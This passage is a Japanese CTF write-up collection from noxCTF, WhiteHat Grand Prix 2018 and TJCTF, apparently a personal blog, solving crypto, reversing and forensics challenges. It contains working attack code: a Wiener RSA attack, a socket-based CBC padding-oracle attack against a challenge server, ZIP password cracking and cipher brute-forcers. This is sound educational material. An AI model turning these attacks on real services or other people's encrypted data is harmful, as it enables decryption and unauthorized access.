    def f(prev):
        while True:
            m = (prev + n/prev)/2
            if m >= prev:
                return prev
            prev = m
    return f(n)

def calcPQ(a,b):
    if a*a < 4*b or a < 0:
        return None
    c = int_sqrt(a*a-4*b)
    p = (a + c) /2
    q = (a - c) /2
    if p + q == a and p * q == b:
        return (p,q)
    else:
        return None

def wiener(n,e):
    kd = calcKD(continued_fractions(n,e))
    for (k,d) in kd:
        if k == 0:
            continue
        if (e*d-1) % k != 0:
            continue
        phin = (e*d-1) / k
        if phin >= n:
            continue
        ans = calcPQ(n-phin+1,n)
        if ans is None:
            continue
        return (ans[0],ans[1])

def leet_to_long(s):
    d = ''
    for c in s:
        d += leets[c]
    return long(d)

N = 'lObAbAbSBlZOOEBllOEbblTlOAbOlTSBATZBbOSAEZTZEAlSOggTggbTlEgBOgSllEEOEZZOSSAOlBlAgBBBBbbOOSSTOTEOllbZgElgbZSZbbSTTOEBZZSBBEEBTgESEgAAAlAOAEbTZBZZlOZSOgBAOBgOAZEZbOBZbETEOSBZSSElSSZlbBSgbTBOTBSBBSOZOAEBEBZEZASbOgZBblbblTSbBTObAElTSTOlSTlATESEEbSTBOlBlZOlAOETAZAgTBTSAEbETZOlElBEESObbTOOlgAZbbOTBOBEgAOBAbZBObBTg'

e = 'lBlbSbTASTTSZTEASTTEBOOAEbEbOOOSBAgABTbZgSBAZAbBlBBEAZlBlEbSSSETAlSOlAgAOTbETAOTSZAZBSbOlOOZlZTETAOSSSlTZOElOOABSZBbZTSAZSlASTZlBBEbEbOEbSTAZAZgAgTlOTSEBEAlObEbbgZBlgOEBTBbbSZAZBBSSZBOTlTEAgBBSZETAbBgEBTATgOZBTllOOSSTlSSTOSSZSZAgSZATgbSOEOTgTTOAABSZEZBEAZBOOTTBSgSZTZbOTgZTTElSOATOAlbBZTBlOTgOSlETgTBOglgETbT'

c = 'SOSBOEbgOZTZBEgZAOSTTSObbbbTOObETTbBAlOSBbABggTOBSObZBbbggggZZlbBblgEABlATBESZgASBbOZbASbAAOZSSgbAOZlEgTAlgblBTbBSTAEBgEOEbgSZgSlgBlBSZOObSlgAOSbbOOgEbllAAZgBATgEAZbBEBOAAbZTggbOEZSSBOOBZZbAAlTBgBOglTSSESOTbbSlTAZATEOZbgbgOBZBBBBTBTOSBgEZlOBTBSbgbTlZBbbOBbTSbBASBTlglSEAEgTOSOblAbEgBAbOlbOETAEZblSlEllgTTbbgb'

leets = {'O': '0', 'l': '1', 'Z': '2', 'E': '3', 'A': '4',
    'S': '5', 'b': '6', 'T': '7', 'B': '8', 'g': '9'}

N = leet_to_long(N)
e = leet_to_long(e)
c = leet_to_long(c)

p, q = wiener(N, e)

flag = decrypt(p, q, e, c)
print flag

noxCTF{RSA_1337_10rd}

Java Corporation (Crypto)

CBC Padding oracle attackで復号する。

import socket

def str_xor(s1, s2):
    return ''.join(chr(ord(a) ^ ord(b)) for a, b in zip(s1, s2))

def unpad(s):
    return s[0:-ord(s[-1])]

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('chal.noxale.com', 3141))

with open('Encrypted.txt', 'rb') as f:
    ciphertext = f.read()

blocks = [ciphertext[i:i+16] for i in range(0, len(ciphertext), 16)]
print blocks


flags = []
for i in range(len(blocks)-1, 0, -1):
    pre_block = blocks[i-1]
    flag_block = ''
    for j in range(16):
        for code in range(256):
            print 'flag_block = %s(%s)' % (flag_block, flag_block.encode('hex'))
            try_iv = '\x00' * (16 - j - 1) + chr(code) + str_xor(str_xor(flag_block, chr(j+1)*j), pre_block[-j:])
            try_cipher = try_iv + blocks[i]
            send_length = str(len(try_cipher))
            print send_length
            s.sendall(send_length)
            print try_cipher
            s.sendall(try_cipher)
            data = s.recv(1)
            print data
            if data == '1':
                xor_code = (j + 1) ^ code ^ ord(pre_block[-j-1])
                flag_block = chr(xor_code) + flag_block
                print flag_block
                break
    flags.append(flag_block)

flags.reverse()
flag = unpad(''.join(flags))
print flag

noxCTF{0n3_p4d_2_f4r}

Welcome(10)

URLのページにアクセスして、slackにログインすると、メッセージにフラグが書いてあった。

WhiteHat{WelcometoGrandPrix2018}

misc02 (Misc)

isoファイルが添付されている。FTK Imagerで開く。
以下をエクスポートしてみる。

・/CDROM/ETC/MAIL/PRIVATE.ASC
・/CDROM/ETC/MAIL/ENCRYPT.PYC
・/MAILDIR/CUR/15334499.com

まずはENCRYPT.PYCをデコンパイルする。

# Embedded file name: ./encrypt.py
import struct
import sys
import base64
password_enc = 'JTd1XyoIbmc3PWhpOjhfVhsIbmcAAAAA'
if len(sys.argv) != 2:
    print 'Usage: %s data' % sys.argv[0]
    exit(0)
data = sys.argv[1]
padding = 4 - len(data) % 4
if padding != 0:
    data = data + '\x00' * padding
result = []
blocks = struct.unpack('I' * (len(data) / 4), data)
for block in blocks:
    result += [block ^ block >> 16]

output = ''
for block in result:
    output += struct.pack('I', block)

print base64.b64encode(output)

パスワードを復号してみる。

import struct
import base64

password_enc = 'JTd1XyoIbmc3PWhpOjhfVhsIbmcAAAAA'
enc = base64.b64decode(password_enc)

result = struct.unpack('I' * (len(enc) / 4), enc)
blocks = []
for res in result:
    blocks += [res ^ res >> 16]
data = ''
for block in blocks:
    data += struct.pack('I', block)

password = data.replace('\x00', '')
print password

パスワードは Phu_Dong_Thien_Vuong。
ASCファイルがあったこともあり、15334499.comのメールから添付ファイルSaintGiong.jpg.pgpを取り出す。これを復号する際にこのパスワードを使う。

$ gpg --import PRIVATE.ASC
gpg: 鍵4BA9AFA0: 秘密鍵をインポートしました
gpg: 鍵4BA9AFA0: 公開鍵"whitehat <whitehat@bkav.vn>"をインポートしました
gpg: 鍵4BA9AFA0:"whitehat <whitehat@bkav.vn>"変更なし
gpg: 処理数の合計: 2
gpg:               インポート: 1
gpg:              変更なし: 1
gpg:       秘密鍵の読み込み: 1
gpg:   秘密鍵のインポート: 1

$ gpg SaintGiong.jpg.pgp 

次のユーザの秘密鍵のロックを解除するには
パスフレーズがいります:"whitehat <whitehat@bkav.vn>"
512ビットELG-E鍵, ID F0EE4293作成日付は2018-08-05 (主鍵ID 4BA9AFA0)

gpg: *警告*: 暗号アルゴリズムCAST5は受取人の優先指定に入っていません
gpg: 512-ビットELG-E鍵, ID F0EE4293, 日付2018-08-05に暗号化されました
      "whitehat <whitehat@bkav.vn>"

SaintGiong.jpgが取り出せた。あとはヒントにもあったが、outguessで秘密情報を取り出す。

$ outguess -r SaintGiong.jpg secret.txt
Reading SaintGiong.jpg....
Extracting usable bits:   65209 bits
Steg retrieve: seed: 70, len: 3388
$ cat secret.txt
While the sixth Hung Vuong Dynasty, our country, then called Van Lang was under the menace of the An , situated in the North of Vietnam’s borders.
Hung Vuong King was very worried and assembled his court to prepare a plan of defense for the country. A mandarin of the civil service reminded the King that the original founding King of the country, Lac Long Quan  had instructed that if the country were ever to face danger, it should pray for his help.
In that situation, the King then invoked the spirit of the founding King. 
Three days later, a very old man appeared in the midst of a storm and said that he was Lac Long Quan himself. He prophesied that in three years the An from the North would try to invade the country; he advised that the King should send messengers all over the country to seek help from talented people, and that thereafter a general sent from heaven would come to save the country.
Event though three years later, indeed came the tempestuous foreign armies trying to take over the Southern Kingdom. At the capital city of Phong Chau, King Hung Vuong still remembered the instruction from Lac Long Quan.
However Even earlier than, at the village of Phu Dong, County of Vo Ninh, Province of Bac Ninh, a woman in her sixties reported she had seen footprints of a giant in the field. 
Amazed, she tried to fit her feet in the footprints and suddenly felt that she was overcome by an unusual feeling. 
Thereafter she became pregnant and delivered a boy whom she named Giong. Even at the age of three, Giong was not able to crawl, to roll over, or to say a single word.
Surprisingly, at the news of the messenger from the King, Giong suddenly sat up and spoke to his mother, asking her to invite the messenger over to their home. 
He then instructed the messenger to request the King to build a horse and a sword of iron for him so that he could go and chase the invaders away.
When the horse and sword were eventually brought to his home, Giong stood up on his feet, stretched his shoulders, became a giant of colossal proportions, and asked his mother for food and new clothing. 
She cooked many pots of rice for him but it was not enough for his appetite. The whole village brought over their whole supply of fabric and it was still not enough for his size.
Giong put his helmet on, carried his sword, jumped on the back of his horse and rode away, as fast as a hurricane. The iron horse suddenly spit fire, and brought Giong to the front line at the speed of lightning. The invaders saw Giong like a punishing angel overwhelming them. 
Their armies were incinerated by the flame thrown from the horse's mouth. Their generals were decapitated by Giong’s sword. When it finally broke because of so much use, Giong used the bamboo trees that he pulled up from the sides of the road and wiped away the enemies.
Afterwards, he left his armor on the mountain Soc (Soc Son) and both man and horse flew into the sky.
Legend holds that lakes in the area of mountain Soc were created from the footprints of Giong’s horse. At the site of the forest where he incinerated the enemy armies is now the Chay Village ("Chay" meaning burned).
In recognition of Giong's achievement, King Hung Vuong proclaimed him Phu Dong Thien Vuong (The Heaven Sent King of Phu Dong Village). For the people of his country, he is better known as Thanh Giong ("Saint" Giong)

フラグは含まれていないが、行頭をつなげるとWHITEHAT...となっている。つなげてもあまり意味のあるフレーズではないが、このままフラグのルールに従い、答えてみる。

WHITEHATSHWSGTALI

このsha1の結果をsubmitしたら通った。

$ echo -n WHITEHATSHWSGTALI | sha1sum
05cc532353023d5954da9507e189a55296f6db97  -

WhiteHat{05cc532353023d5954da9507e189a55296f6db97}

re06 (Rev)

$ file reverse.exe 
reverse.exe: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows

ILSpyでデコンパイルすると、key(入力データ)を暗号化して比較していることがわかる。関係するコードは以下の部分。

public static string Enc(string s, int e, int n)
{
	int[] array = new int[s.Length];
	for (int i = 0; i < s.Length; i++)
	{
		array[i] = (int)s[i];
	}
	int[] array2 = new int[array.Length];
	for (int i = 0; i < array.Length; i++)
	{
		array2[i] = MainWindow.mod(array[i], e, n);
	}
	string text = "";
	for (int i = 0; i < array.Length; i++)
	{
		text += (char)array2[i];
	}
	return Convert.ToBase64String(Encoding.Unicode.GetBytes(text));
}

public static int mod(int m, int e, int n)
{
	int[] array = new int[100];
	int num = 0;
	do
	{
		array[num] = e % 2;
		num++;
		e /= 2;
	}
	while (e > 0);
	int num2 = 1;
	for (int i = num - 1; i >= 0; i--)
	{
		num2 = num2 * num2 % n;
		bool flag = array[i] == 1;
		if (flag)
		{
			num2 = num2 * m % n;
		}
	}
	return num2;
}

private void btn_check_Click(object sender, RoutedEventArgs e)
{
	string text = this.tb_key.Text;
	string a = MainWindow.Enc(text, 9157, 41117);
	bool flag = a == "iB6WcuCG3nq+fZkoGgneegMtA5SRRL9yH0vUeN56FgbikZFE1HhTM9R4tZPghhYGFgbUeHB4tEKRRNR4Ymu0OwljQwmRRNR4jWBweOKRRyCRRAljLGQ=";
	if (flag)
	{
		MessageBox.Show("Correct!! You found FLAG");
	}
	else
	{
		MessageBox.Show("Try again!");
	}
}

暗号化しているが先頭から一文字ずつ変換しているので、ブルートフォースで復号する。

import struct

def mod(m, e, n):
    array = []
    num = 0
    while e > 0:
        array.append(e % 2)
        num += 1
        e /= 2

    num2 = 1
    for i in range(num-1, -1, -1):
        num2 = num2 * num2 % n
        flag = (array[i] == 1)
        if flag:
            num2 = num2 * m % n

    return num2

enc = 'iB6WcuCG3nq+fZkoGgneegMtA5SRRL9yH0vUeN56FgbikZFE1HhTM9R4tZPghhYGFgbUeHB4tEKRRNR4Ymu0OwljQwmRRNR4jWBweOKRRyCRRAljLGQ='
enc = enc.decode('base64')

flag = ''
for i in range(0, len(enc), 2):
    for code in range(32, 127):
        enc_val = struct.unpack('H', enc[i:i+2])[0]
        if mod(code, 9157, 41117) == enc_val:
            flag += chr(code)
            break

print flag

復号結果は以下の通り。

WhiteHat{N3xT_t1m3_I_wi11_Us3_l4rg3_nUmb3r}

$ echo -n N3xT_t1m3_I_wi11_Us3_l4rg3_nUmb3r | sha1sum
be1f21d22d6ca5854be238772c7ac594eadc5ab0  -

WhiteHat{be1f21d22d6ca5854be238772c7ac594eadc5ab0}

misc04 (Misc)

$ nc misc04.grandprix.whitehatvn.com 1337
                   Wellcom to Friendly face challenge
According to experts, the formula for measuring the friendliness of a face is
    (lip point**nose point)**(eyes point**forehead point) mod Face_index
                              Now play!
------------------------------Stage 1--------------------------------------
Face_index: 4431737
Face           Lip point      Nose point     Eyes point     Forehead point 
:-)            596242442      481469043      970458274      32703946       
(';')          376021014      272175871      239425572      184621759      
(=^..^=)       485755959      459822117      70984484       6425194        
:)             977865016      739654486      296805231      562258274      
:-]            914395562      938717142      921361199      576965573      
:]             336429352      943961753      752611213      95370167       
:-3            165943262      966598407      516473754      772879133      
:3             889297404      23840982       606500337      736303577      
:->            541245039      283886587      250236527      771824867      
:>             636612689      936249233      319980673      338877742      
:-*            241647692      317174427      975314731      502081872      
:*             271638886      843604355      472679688      853083969      
(>_<)          633930454      209230772      52469366       895198448      
(>_<)>         995527139      208600614      858498435      577040482      
(';')          848596099      405700489      337685577      326163258      
(^_^;)         988185554      243044144      381916894      268647763      
(-_-;)         870125849      588116350      324643650      969271622      
(~_~;)         591753167      492749098      383987089      89199361       
(...;)         465374817      677444547      342357343      575883393      
(._.;)         525027485      646708335      571869565      488171404      
^_^;           95013153       882921976      251013374      223048438      
(#^.^#)        972541934      323081701      97697337       965645600      
(^^;)          168319131      893468036      677026321      667083111      
(-_-)zzz       460308725      713998921      157547765      873272113      
(^_-)          469080168      586577044      302298730      848820916      
((+_+))        310684442      806220740      489486988      730554133      
(+o+)          341931559      973851008      634295881      273149870      
^_^            435459073      803947061      403135837      249163168      
(^_^)/         817248024      461457840      122466022      287654650      
(=_=)          845486756      431899563      497453104      360016272      
(?_?)          347478160      220003849      28100026       958712334      
(^_^)          626921993      801762983      661020071      997855657      
(~o~)          225789800      631406677      535015751      189783066      
(~_~)          807938286      952126927      764786442      638732424      
o.O            871975848      257408524      426299419      59896758       
(o.o)          63223248       978835775      546529382      264433328      
oO             679254801      413413444      55017139       283662476      
<_<            736488270      359509676      929803086      369891930      
>_>            299626511      442201749      519739934      670684760      
<o?o>          674680095      856927711      496756490      81590770       
(>^.^)         780245547      254744992      229038267      629703628      
(^.^<)         405281708      687157157      353015431      755281648      
>,<            106378055      890404087      529192804      606538580      
;-(            513181644      459706648      529613032      931311838      
>:-(           587016768      782815123      713576827      321597509      
@(-_-)@        840506996      817976971      661753791      145890981      
@(^_^)@        863474035      182809717      514177192      793174325      
~O-O~          601211571      288325382      344765291      760697124      
:)]            991917239      864698356      68391752       351680770      
.-]            850742773      807690508      545894722      208852551      
.-)            455598369      432662165      229771808      821952329      
,-)            213887745      346518966      711375633      250280917      
':-(           385654334      97532947       860838537      433534132      
'-)            179269337      658324086      844837058      417744279      
:-D            466848302      21928777       173955338      339563435      
:=)            913770274      142738487      639227727      617937904      
:@             98765894       80122883       376496439      512041497      
<:-P           203112529      952067844      367806426      985693940      
:)>-           745938793      316337810      889074330      870349911      
:^)            78379055       630302543      166701512      857017312      
3:]            971098181      397257584      918930423      279788878      
(o^-^o)        914732303      267597906      802970827      263807313      
:-<            223587166      847745996      586708464      364485219      
:-[            88492755       312737068      227998177      147624657      
=:-)           234906718      528787599      937723179      306554978      
:-))           52586325       461817008      128874650      893917472      
<(-_-)>        760182940      838643548      569363638      165283155      
9_9            467028132      200982165      373411705      677154110      
=))            74217800       328284351      544357486      389014675      
7:)            902982576      879211080      828715890      606436127      
(<_>)          2776721        76548332       865922170      259242177      
:-(            329706650      201191399      779171278      178316061      
/:-)           703311712      629592477      807987564      737871016      
(-_-)          774112499      869284313      888552912      485637638      
:-*            680165343      32169796       588924131      455402899      
::=))          687239847      415460801      14828524       814673043      
o_o            849115553      951309125      769144825      682517755      
(*^_^*)        366967935      996883255      849091516      246423566      
(-::-)         64120405       829403093      668581993      835182060      
(^o^)          639633361      468110723      19523831       330311527      
:o)            803410338      522232647      772545391      737437770      
:|)            484447392      666349300      258910284      78499833       
:)             409969972      118803071      710326500      629936392      
:-)            420257921      758815700      702535489      591591244      
+:-)           507046230      974840616      136692833      433025097      
(:-)           931372485      303883708      928836052      845244431      
{:-)           414675990      737799366      915519879      946345418      
^&^            456715850      142166824      722043282      192560271      
=.=            854827506      962541908      219205017      564922319      
*~*            900518063      723307297      400360093      18021808       
(:>-<          409382634      372954587      455650500      452411178      
:-)---         765540422      292310472      220804776      20363262       
*-)            397286723      348184258      389371743      671368534      
>:*            456816308      557167076      448745985      898262835      
>.<            12017132       326539650      358099709      282393116      
:-@            20947658       86440236       159831491      77993591       
(:)-)          904767042      791772164      496897476      164869087      
::-)           483154180      173670907      43310880       167017739      
:-@            198644174      596224399      626716663      456640512      
@,.,@          935382486      691468677      584587520      179793294      
:-E            886076455      133288396      888456455      587622650      
:-[            833439341      164664199      751477298      722238083      
:-))           268158726      596277349      101793289      489763555      
:-[]           407141231      937381763      271820471      265582637      
:-)))          196127048      499086408      990692220      2709060        
(:-            530684193      355430256      33688527       743788259      
$_$            316493696      195845248      525788623      511389186      
(^:^)          644677468      362317579      479927686      853389642      
|___|          538871904      466692897      66164139       438963213      
:-)            7578352        593661332      991357690      997018911      
>O<            891811590      97984259       991030669      385697450      
:=)            252470814      906895930      98153725       829521427      
-:-)           901385711      643039757      71143493       147926124      
|:-)           695240184      778952493      491221544      894194207      
<(^.^<)        467571699      733944108      791210408      100078959      
<(*.*<)        679554586      373254869      810247219      294345618      
(*_*)          651786733      266904383      29442527       770000822      
._.            257615504      236664306      608767705      600223050      
@:-)           880803862      926737903      452048108      454010314      
<('.')>        733058449      892810814      773530725      528000556      
<('.'<)        579430788      304149147      577861147      583328793      
<(^.^)>        507019421      322208452      317046110      376912296      
<('.'<)        898401668      183862749      636714889      651053202      
:-*            590108193      139904728      644562260      706500409      
(:-*           514296447      200156909      401814197      105831470      
=^.^=          702596661      515873731      151349969      623222790      
<{::}>         478232622      936554793      478880525      609936656      
:-D            49331946       257073961      139570287      615626763      
:))            252760793      192745055      823359582      852633482      
:.-)           863450527      693239366      746928783      389664603      
(-:            835350723      340687976      181493414      47548225       
>;->           421466938      907922662      724741530      713999622      
:^o            259616359      79906074       328077364      655097082      
:-9            62427531       565086054      667084032      441954088      
So, what is the most friendly face?

(lip point**nose point)**(eyes point**forehead point) mod Face_index
をまともに計算すると時間がかかり終わらない。

中国人剰余定理などを使って、時間がかからない計算式に変える。

a = lip point
b = nose point
c = eyes point
d = forehead point
n = Face_index

pow(a ** b, c ** d, n)
= pow(pow(a, b, n), pow(c, d, phi), n)

nを素因数分解する必要あり。

phi = (p1-1) * (p2-1) * (p3-1) ...

あとはfriendlinessのポイントの高い顔文字とポイントを答えていく。

import socket
import re
from factordb.factordb import FactorDB

def get_friendliness(lip, nose, eyes, forehead, index, phi):
    return pow(pow(lip, nose, index), pow(eyes, forehead, phi), index)

def recvuntil(s, tail):
    data = ''
    while True:
        if tail in data:
            return data
        data += s.recv(1)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('misc04.grandprix.whitehatvn.com', 1337))

while True:
    data = recvuntil(s, 'So, what is the most friendly face?\n')
    print data

    pattern = 'Face_index\: (.+)'
    m = re.search(pattern, data)
    face_index = int(m.group(1))

    f = FactorDB(face_index)
    f.connect()
    elms = f.get_factor_list()
    dic_elms = {}
    for elm in elms:
        if elm not in dic_elms:
            dic_elms[elm] = 1
        else:
            dic_elms[elm] += 1

    phi = 1
    for elm in dic_elms:
        phi *= (elm - 1) * elm ** (dic_elms[elm] - 1)

    pattern = 'Forehead point \n(.+)\nSo, what'
    m = re.search(pattern, data, re.DOTALL)
    face_table = m.group(1).split('\n')

    faces_points = {}
    for line in face_table:
        face = line.split()[0]
        points = map(int, line.split()[1:])
        friendliness = get_friendliness(points[0], points[1],
            points[2], points[3], face_index, phi)
        faces_points[face] = friendliness

    best_face = max(faces_points, key=faces_points.get)
    print best_face
    s.sendall(best_face + '\n')
    data = s.recv(1024)
    print data

    best_point = faces_points[best_face]
    print best_point
    s.sendall(str(best_point) + '\n')
    data = s.recv(1024)
    print data
    if 'WhiteHat{' in data:
        break

5回正解すると、フラグが表示された。

WhiteHat{^.^_M4th_Math_Chin3se_Rema1nder_The0rem_&_Euler's_ThEorem_M@th_MAth_^/^}

$ echo -n "^.^_M4th_Math_Chin3se_Rema1nder_The0rem_&_Euler's_ThEorem_M@th_MAth_^/^" | sha1sum
883e8e59798f1884c3873ff5f47aaeea089097f9  -

WhiteHat{883e8e59798f1884c3873ff5f47aaeea089097f9}

Blank (Web 5)

HTMLソースを見ると、コメントにフラグが書いてある。

tjctf{50urc3_c0d3_n3v3r_l0535}

Trippy (Miscellaneous 5)

GIFファイルが与えられている。

$ strings be37fef78cfd6c7deda71154f567e6d0cfefbda1f80698c064bab469d3a54c58_trippy.gif | grep tjctf
tjctf{w0w}

tjctf{w0w}

Weird Logo (Forensics 5)

StegsolveでPNGファイルを開く。
Red plane 1でフラグが表示された。

tjctf{in_plain_sight}

Discord! (MIscellaneous 5)

Discordにjoinする。#flagチャネルのメッセージにフラグが書いてある。

tjctf{d1sc0rd_1s_pr3tty_c0ol}

Cookie Monster (Web 10)

クッキーのflagパラメータにフラグが設定されている。
>
tjctf{c00ki3s_over_h0rs3s}

Central Savings Account (Web 10)

HTMLソースを見る。https://central_savings_account.tjctf.org/static/main.jsを見ると、パスワードはmd5が698967f805dea9ea073d188d73ab7390になるものとわかる。Googleで逆変換したデータを検索する。

avalon

Vinegar (Cryptography 15)

Vigenere暗号。キーの長さは9。先頭5文字はtjctfに復号されることから、キーの前半5文字だけ決定できる。残り4文字はブルートフォースでハッシュ値が一致するものを探す。

import string
import hashlib
import itertools

def get_flag(s):
    flag = s[:5]
    flag += '{'
    flag += s[5:]
    flag += '}'
    return flag

target = '8304c5fa4186bbce7ac030d068fdd485040e65bf824ee70b0bdbac03862bec93'

al_l = string.lowercase

c = 'uucbxsimbjyaqyvzbzfdatshktkbde'
p_head = 'tjctf'
k_size = 9

k = ''
for i in range(len(p_head)):
    index = al_l.index(c[i]) - al_l.index(p_head[i])
    if index < 0:
        index += len(al_l)
    k += al_l[index]

for s in itertools.product(al_l, repeat=4):
    key = k + ''.join(s)
    p = ''
    for i in range(len(c)):
        index = al_l.index(c[i]) - al_l.index(key[i%k_size])
        if index < 0:
            index += 26
        p += al_l[index]
        flag = get_flag(p)
    if hashlib.sha256(flag).hexdigest() == target:
        print 'key =', key
        print 'flag =', flag
        break

実行結果は以下の通り。

key = blaisevig
flag = tjctf{onevinaigrettesaladplease}

tjctf{onevinaigrettesaladplease}

Caesar's Complication (Cryptography 20)

縦横斜めでtjctf{のシフト暗号を探す。見つけたらその部分を復号する。

import string

def ceaser(s, shift):
    chars = string.lowercase
    enc = ''
    for i in range(len(s)):
        if s[i] in chars:
            idx = chars.index(s[i]) + shift
            if idx >= 26:
                idx -= 26
            enc += chars[idx]
        else:
            enc += s[i]
    return enc

def get_enc_flag(tbl, x0, y0, x_vec, y_vec):
    enc_flag = ''
    x = x0
    y = y0
    while True:
        if x < -1 or x > 99 or y < 0 or  y > 99:
            break
        enc_flag += tbl[x][y]
        x += x_vec
        y += y_vec
    enc_flag = enc_flag[:enc_flag.find('}') + 1]
    return enc_flag

def decrypt_flag(s):
    for i in range(26):
        flag = ceaser(s, i)
        if flag.startswith(pre_flag):
            return flag
    return ''

pre_flag = 'tjctf{'
l = len(pre_flag)

words = []
for i in range(26):
    words.append(ceaser(pre_flag, i))

with open('puzzle', 'r') as f:
    lines = f.readlines()

tbl = []
for line in lines:
    tbl.append(list(line.strip()))

## across ##
for i in range(100):
    for j in range(101 - len(pre_flag)):
        parts = ''.join(tbl[i][j:j+l])
        for word in words:
            if parts == word:
                print 'across'
                enc_flag = get_enc_flag(tbl, i, j, 0, 1)

## down ##
for i in range(101 - len(pre_flag)):
    for j in range(100):
        parts = ''
        for k in range(len(pre_flag)):
            parts += tbl[i+k][j]
            for word in words:
                if parts == word:
                    print 'down'
                    enc_flag = get_enc_flag(tbl, i, j, 1, 0)

## right down ##
for i in range(101 - len(pre_flag)):
    for j in range(101 - len(pre_flag)):
        parts = ''
        for k in range(len(pre_flag)):
            parts += tbl[i+k][j+k]
            for word in words:
                if parts == word:
                    print 'right down'
                    enc_flag = get_enc_flag(tbl, i, j, 1, 1)

## left down ##
for i in range(101 - len(pre_flag)):
    for j in range(len(pre_flag), 100):
        parts = ''
        for k in range(len(pre_flag)):
            parts += tbl[i+k][j-k]
            for word in words:
                if parts == word:
                    print 'left down'
                    enc_flag = get_enc_flag(tbl, i, j, 1, -1)

## right up ##
for i in range(len(pre_flag), 100):
    for j in range(101 - len(pre_flag)):
        parts = ''
        for k in range(len(pre_flag)):
            parts += tbl[i-k][j+k]
            for word in words:
                if parts == word:
                    print 'right up'
                    enc_flag = get_enc_flag(tbl, i, j, -1, 1)

## left up ##
for i in range(len(pre_flag), 100):
    for j in range(len(pre_flag), 100):
        parts = ''
        for k in range(len(pre_flag)):
            parts += tbl[i-k][j-k]
            for word in words:
                if parts == word:
                    print 'left up'
                    enc_flag = get_enc_flag(tbl, i, j, -1, -1)

flag = decrypt_flag(enc_flag)
print flag

実行結果は以下の通り。

right up
tjctf{idesofmarch}

tjctf{idesofmarch}

Classic (Cryptography 40)

RSA暗号。Fermat法でnを素因数分解し、復号する。

from Crypto.Util.number import inverse

def isqrt(n):
    x = n
    y = (x + n // x) // 2
    while y < x:
        x = y
        y = (x + n // x) // 2
    return x

def fermat(n):
    x = isqrt(n) + 1
    y = isqrt(x * x - n)
    while True:
        w = x * x - n - y * y
        if w == 0:
            break
        elif w > 0:
            y += 1
        else:
            x += 1
    return x - y, x + y

e = 65537
n = 128299637852747781491257187842028484364103855748297296704808405762229741626342194440837748106022068295635777844830831811978557490708404900063082674039252789841829590381008343327258960595508204744589399243877556198799438322881052857422197506822302290812621883700357890208069551876513290323124813780520689585503
c = 43160414063424128744492209010823042660025171642991046645158489731385945722740307002278661617111192557638773493117905684302084789590107080892369738949935010170735247383608959796206619491522997896941432858113478736544386518678449541064813172833593755715667806740002726487780692635238838746604939551393627585159

p, q = fermat(n)

phi = (p - 1) * (q - 1)
d = inverse(e, phi)
m = pow(c, d, n)

flag = ('%x' % m).decode('hex')
print flag

tjctf{1_l1ke_squares}

RC4 took an L (Cryptography 40)

いろいろ調べたら、RC4ならぬLC4というのがあるらしい。
https://eprint.iacr.org/2017/339.pdf
alphabetは#_23456789abcdefghijklmnopqrstuvwxyzで問題と一致する。pythonでlc4ライブラリがあるので、それを使えば簡単に復号できる。

from lc4 import decrypt

key = 'pq_xc589r3nb#mgjtkh7w2dlfvy4eaoi6uzs'
ciphertext = 'wpwt#5ng4_qbitp#8mq59r_g866c4t59c6vy6tisj4af6bprfnbd_wrq2wjmr4ld_s26a7i#biiyqjolq8lus_wfusfkj8xv2qrrv3etab_marovc#uuoueyl'

flag = decrypt(key, ciphertext)
print flag

復号すると、以下の文字列。

i_hope_that_by_making_this_long_you_will_assume_substitution_cipher_and_go_to_quip_qiup_the_flag_is#elsie_four_is_not_rc4

tjctf{elsie_four_is_not_rc4}

Grid Parser (Forensics 45)

ZIP解凍し、xl/media/password.pngを取り出す。ファイルの後半がZIPになっているが、パスワードがかかっている。

$ fcrackzip -u -l 1-4 flag.zip


PASSWORD FOUND!!!!: pw == px

このパスワードで解凍したflag.txtにフラグが書いてある。

tjctf{n0t_5u5_4t_4LL_r1gHt?}

Bad Cipher (Reverse Engineering 50)

コードを読む。sはmessageをkeyの長さに振り分けたもの。

例）
message = "ABCDEFGHI"
key = "aaaa"
['AEI', 'BF', 'CG', 'DH']

■変換
[0]
0: ord('A') ^ ord(k[0]) ^ (a00>>2) -> (sp)
1: ord('E') ^ ord(k[0]) ^ (a01>>2) -> ,
2: ord('I') ^ ord(k[0]) ^ (a02>>2) -> #
[1]
0: ord('B') ^ ord(k[1]) ^ (a10>>2) -> #
1: ord('F') ^ ord(k[1]) ^ (a11>>2) -> /
[2]
0: ord('C') ^ ord(k[2]) ^ (a20>>2) -> "
1: ord('G') ^ ord(k[2]) ^ (a21>>2) -> .
[3]
0: ord('D') ^ ord(k[3]) ^ (a30>>2) -> %
1: ord('H') ^ ord(k[3]) ^ (a31>>2) -> (sp)

変換した後、組ごとに配列にするため、上記の例だとAEIのIは切り落とされる。あとはその順番で16進数表記でASCIIコードを表示する。

202322252c2f2e20
   # " % , / .

暗号の長さは112。56バイト。keyの長さはその約数になる。

1, 2, 4, 7, 8, 14, 28, 56

keyの長さは7バイトか8バイトあたりと考えられる。調整しながら確認していく。
7バイトだと、printableなフラグにならない。8バイトで復号した文字列がフラグになりそう。
keyの末尾2バイトはブルートフォースで復号を試し、フラグになるものを探す。

import itertools
import string

def d(c, k, skip):
    s = [''] * skip
    for i in range(skip):
        for j in range(len(c)/skip):
            s[i] += c[i+j*skip]
    for i in range(skip):
        a, d = 0, ''
        for j in range(len(s[i])):
            b = ord(s[i][j]) ^ ord(k[i]) ^ (a>>2)
            d += chr(b)
            a = ord(s[i][j])
        s[i] = d
    dec = ''
    for j in range(len(c)/skip):
        for i in range(skip):
            dec += s[i][j]
    return dec

def is_flag(s):
    if s[-1] != '}':
        return False

    for i in range(len(s)):
        code = ord(s[i])
        if code < 32 or code > 126:
            return False

    if s.count('}') > 1 or s.count('{') > 1:
        return False

    return True

enc = '473c23192d4737025b3b2d34175f66421631250711461a7905342a3e365d08190215152f1f1e3d5c550c12521f55217e500a3714787b6554'

for c in itertools.product(string.printable, repeat=2):
    known = 'tjctf{' + ''.join(c)
    key = ''
    for i in range(len(known)):
        code = int(enc[i*2:i*2+2], 16) ^ ord(known[i]) ^ (0>>2)
        key += chr(code)

    flag = d(enc.decode('hex'), key, len(key))
    if is_flag(flag):
        print flag

結果は以下の通りで、一つに定まらない。

tjctf{a4ybe_Wr=t3ing_mU_3ncRypX10N_MY5ilf_W4Snx_v_sm4R;}
